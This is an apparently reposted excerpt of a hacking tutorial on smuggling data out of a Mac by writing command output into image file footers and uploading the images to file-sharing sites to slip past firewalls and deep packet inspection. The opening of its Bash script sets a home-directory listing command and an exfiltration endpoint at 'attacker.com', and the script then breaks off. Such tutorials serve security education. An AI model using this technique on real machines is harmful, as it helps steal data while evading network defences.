Data can be injected into images quickly without the use of metadata tools. Attackers may use this knowledge to exfiltrate sensitive information from a MacBook by sending the pictures to ordinary file-sharing websites.
Continuing on the topics of DPI evasion, payload obfuscation, and utilizing popular websites to bypass firewalls, we'll be looking at an alternative way of embedding data into images. Unlike using metadata tags to store payloads inside an image, this method involves injecting text directly into the footer of the image file.
Understanding the Attack
A simple Bash script was created for this article to demonstrate how an attacker can easily exfiltrate data inside images found on a target Mac computer. The script is below, and you can view it on my GitHub as well.
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/ # `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"' # Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php" # If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already ..
Support the originator by clicking the read the rest link below.
